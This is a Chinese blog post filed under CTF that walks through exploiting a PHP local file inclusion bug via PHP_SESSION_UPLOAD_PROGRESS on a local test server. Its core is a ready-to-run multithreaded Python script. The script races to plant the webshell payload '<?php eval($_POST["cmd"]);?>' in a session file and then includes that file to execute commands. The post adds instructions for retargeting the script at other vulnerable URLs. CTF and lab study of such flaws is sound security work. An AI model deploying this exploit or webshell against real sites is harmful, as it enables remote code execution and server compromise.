PHP_Session文件上传利用:文件包含

最新推荐文章于 2023-12-18 15:49:53 发布
最新推荐文章于 2023-12-18 15:49:53 发布
阅读量656 收藏 3
点赞数 1
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/soldi_er/article/details/117029481
版权

文章目录

本地测试

  本地PHP的默认配置:
在这里插入图片描述

环境说明

  (1)软件和文件位置说明:

项目说明
文件包含文件的位置http://127.0.0.1/include.php
Session文件的相对存储位置…/Extensions\tmp\tmp\
Python解释器版本python2.7,22行和25行使用xrange()
Python解释器版本Python3.7,22行和25行使用range()
操作系统Win10
PHP配置php5.5.9 默认配置

  (2)具有文件包含漏洞的数据包如下,具有PHPSESSID参数。

GET /include.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Hm_lvt_0fba23df1ee7ec49af558fb29456f532=1620301597; security_level=0; PHPSESSID=t2n4a5bgv3mbr1ciupntlk67s7
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Python脚本

  既然Python3可以运行,那就贴出本地成功测试的Python3脚本。

#coding=utf-8
import io
import requests
import threading
sessid = 'TGAO'
data = {"cmd":"system('whoami');"}
def write(session):
    while True:
        f = io.BytesIO(b'a' * 1024 * 50)    # 写入session文件,会话文件名为sess_sessid
        resp = session.post( 'http://127.0.0.1/include.php', data={'PHP_SESSION_UPLOAD_PROGRESS': '<?php eval($_POST["cmd"]);?>'}, files={'file': ('tgao.txt',f)}, cookies={'PHPSESSID': sessid} )
def read(session):
    while True:	# 注意,反斜杠需要转义
        resp = session.post('http://127.0.0.1/include.php?file=../Extensions\\tmp\\tmp\\sess_'+sessid,data=data)
        if 'tgao.txt' in resp.text:
            print(resp.text)
            event.clear()
        else:
            print("[+++++++++++++]retry")
if __name__=="__main__":
    event=threading.Event()
    with requests.session() as session:
        for i in range(1,30):  # Python2使用xrange(1,30)
            threading.Thread(target=write,args=(session,)).start()

        for i in range(1,30):   # Python2使用xrange(1,30)
            threading.Thread(target=read,args=(session,)).start()
    event.set()

  Python3.7的运行效果如下,Python2的运行效果不贴了。
在这里插入图片描述

修改Python利用脚本

  自己本地利用漏洞需要修改的地方,以下为最少修改。
第6行的data,可以自定义命令;
第10行的url,需要配置成具有文件包含漏洞的URL地址;
第13行的url,需要配置成sess_xx文件存储的位置。

区块链市场观察家
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
PHP上传文件
ouyang的博客
06-25 312
在很多网站中都需要上传文件,例如:图片、文档。下面我来分享一下我写的上传文件的方法。我是用类写的。 思路是: 首先获取上传的文件名称,对其进行重命名(防止文件重复)。 然后使用move_uploaded_file()函数将文件放置到的要上传的位置。 要注意html文件在上传文件是表单里要使用enctype=”multipart/form-data”这个属性。你需要先建立上传的文件夹(我的是uploa
利用PHP_SESSION_UPLOAD_PROGRESS上传webshell
god_Zeo的安全博客
09-24 760
0x01 环境配置&利用条件 环境分析 session.use_strict_mode默认值为0,此时用户是可以自己定义Session ID的 我们在Cookie里设置PHPSESSID=flag,PHP将会在服务器上创建一个文件:/tmp/sess_flag session.upload_progress.prefix由我们构造的session.upload_progress.name值组成,最后被写入sess_文件里。 所以: 这个文件名是PHPSESSID=flag,文件名
php会话上传进度,PHP基于session+ajax实现文件上传进度条
weixin_34486033的博客
04-07 118
一、场景及方案介绍Web应用中常常需要提供文件上传功能,典型的应用场景有用户头像、相册照片上传等。当要上传的文件比较大的时候,为了更好的用户体验,显示文件上传进度是必要。在PHP5.4之前,php实现文件上传进度条,主要有三种方法:使用flash、java、activeX使用PHP的APC扩展使用HTML5的FILE API第一种方法依赖第三方的浏览器插件,通用性不好,并且存在安全隐患。不过由于f...
PHP】------- PHP 上传文件及图片代码
皮皮冰要做大神
07-28 1507
1. 图片上传php 代码 <?php session_start(); $number = isset($_POST['typename'])? $_POST['typename'] : ''; $_SESSION['id'] = $number; $response = array(); $_SESSION['count']=count(...
Session文件包含
一只web狗
06-23 3438
session文件包含介绍
文件包含Session文件包含
最新发布
weixin_52096670的博客
12-18 466
ctfs=ctfs 后,会在/var/lib/php/session目录下存储session的值。该选项不开启,我们可以自定义session_id,如,我们在请求数据包设置cookie为PHPSESSID=123,那么就会生成一个sess_123的session文件,此时php会自动初始化session,并产生一个键值,格式为配置文件中的session.upload_progress.prefix的值+我们上传session.upload_progress.name的值此键值会写入session文件。
iwebsec 文件包含篇 (已完结)
qq_60829702的博客
03-30 1691
iwebsec 文件包含,详细分析,持续更新
session文件包含漏洞详解
永远是少年
12-14 1382
今天继续给大家介绍渗透测试相关知识,本文主要内容是session文件包含漏洞详解。 一、session文件包含简介 二、session文件包含实战
PHP开发实战1200例(第1卷).(清华出版.潘凯华.刘中华).part1
06-14
4.1 文件上传 285 实例223 以二进制形式上传文件到数据库 285 实例224 上传文件到服务器 287 实例225 限制上传文件的大小 288 实例226 限制上传文件的类型 291 实例227 上传多个文件到服务器 292 4.2 文件下载 294 ...
PHP开发实战1200例(第1卷).(清华出版.潘凯华.刘中华).part2
06-14
4.1 文件上传 285 实例223 以二进制形式上传文件到数据库 285 实例224 上传文件到服务器 287 实例225 限制上传文件的大小 288 实例226 限制上传文件的类型 291 实例227 上传多个文件到服务器 292 4.2 文件下载 294 ...
大名鼎鼎SWFUpload- Flash+JS 上传
12-19
 SWFUpload是一个客户端文件上传工具,最初由Vinterwebb.se开发,它通过整合Flash与JavaScript技术为WEB开发者提供了一个具有丰富功能继而超越传统标签的文件上传模式。 [编辑本段]SWFUpload的主要特点  * 可以...
CTF Web各种题目的解题姿势
07-27
第3章 文件上传文件包含 课时1:文件上传漏洞原理与简单实验17'10 课时2:文件上传利用 - javascript客户端检查14'16 课时3:文件上传利用 - MIME类型检查10'50 课时4:文件上传利用 - 黑名单检查11'46 课时5...
JAVA上百实例源码以及开源项目
01-03
 Java访问权限控制,为Java操作文件、写入文件分配合适的权限,定义写到文件的信息、定义文件,输出到c:/hello.txt、写信息到文件、关闭输出流。 Java绘制图片火焰效果 1个目标文件 摘要:Java源码,图形操作,火焰...
PHP利用Session实现上传进度
风口上的猪博客
11-03 268
实现文件上传进度条基本是依靠JS插件或HTML5的File API来完成,其实PHP配合ajax也能实现此功能。 PHP手册对于session上传进度是这么介绍的: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 当 session.upload_progress.enabled INI 选项开启时,PHP 能够在每一个文件上传时监测上传进度。 这个信息
PHP Session和Javascript实现文件上传进度条
huank_dmy的博客
07-13 545
PHP Session和Javascript实现文件上传进度条Web应用中常需要提供文件上传的功能。典型的场景包括用户头像上传、相册图片上传等。当需要上传的文件比较大的时候,提供一个显示上传进度的进度条就很有必要了。在PHP 5.4以前,实现这样的进度条并不容易,主要有三种方法: 1、使用Flash, Java, ActiveX 2、使用PHP的APC扩展 3、使用HTML5的File AP
【Servlet学习六】Cookie 与Session && 实现登录与上传文件
qq_48479056的博客
06-30 696
(1)HttpServletRequest 类方法方法描述获取请求中给定 name 的文件获取所有的文件(2)Part 类方法方法描述获取提交的文件名获取提交的文件类型获取文件的大小把提交的文件数据写入磁盘文件。
【网络安全】文件包含漏洞--使用session进行文件包含
你在看屏幕的同时,屏幕也在注视着你
09-04 1275
使用session进行文件包含
iwebsec靶场文件包含漏洞-session本地包含
qq_56041380的博客
04-02 322
当获取Session文件的路径并且Session的内容可控时,就可以通过包含Session文件进行攻击
Android中[email protected]和HIDL::IAGM::ipc_agm_session_prepare::server是什么
07-14
HIDL::IAGM::ipc_agm_session_prepare::server 可能是一个与 [email protected] 相关的接口或函数。它可能是用于在 Android 中准备 AGM 会话的一部分。如果你需要了解更多关于 [email protected] 和 HIDL::IAGM::ipc_agm...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值